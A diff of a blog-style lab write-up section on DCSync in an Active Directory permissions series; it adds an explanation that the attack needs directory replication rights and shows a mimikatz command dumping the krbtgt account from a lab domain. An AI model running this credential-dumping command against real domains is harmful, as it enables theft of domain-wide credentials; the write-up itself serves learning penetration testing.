N4iF/pwn.sa-website/content/posts/DACL1/DACL1.md

 ## DCsync

-let's try close the windows and run it again and test dcsync using mimikatz `mimikatz # lsadump::dcsync /domain:inlanefreight.local /user:krbtgt`
+let's try close the windows and run it again and test dcsync using mimikatz Running DCSync requires replication privileges (like Replicating Directory Changes and Replicating Directory Changes All) or an ACL that grants them.
+Local admin rights alone aren’t enough.
+WE GOT THIS RIGHT

+`mimikatz # lsadump::dcsync /domain:inlanefreight.local /user:krbtgt`

 ![](/posts/DACL1/24.png)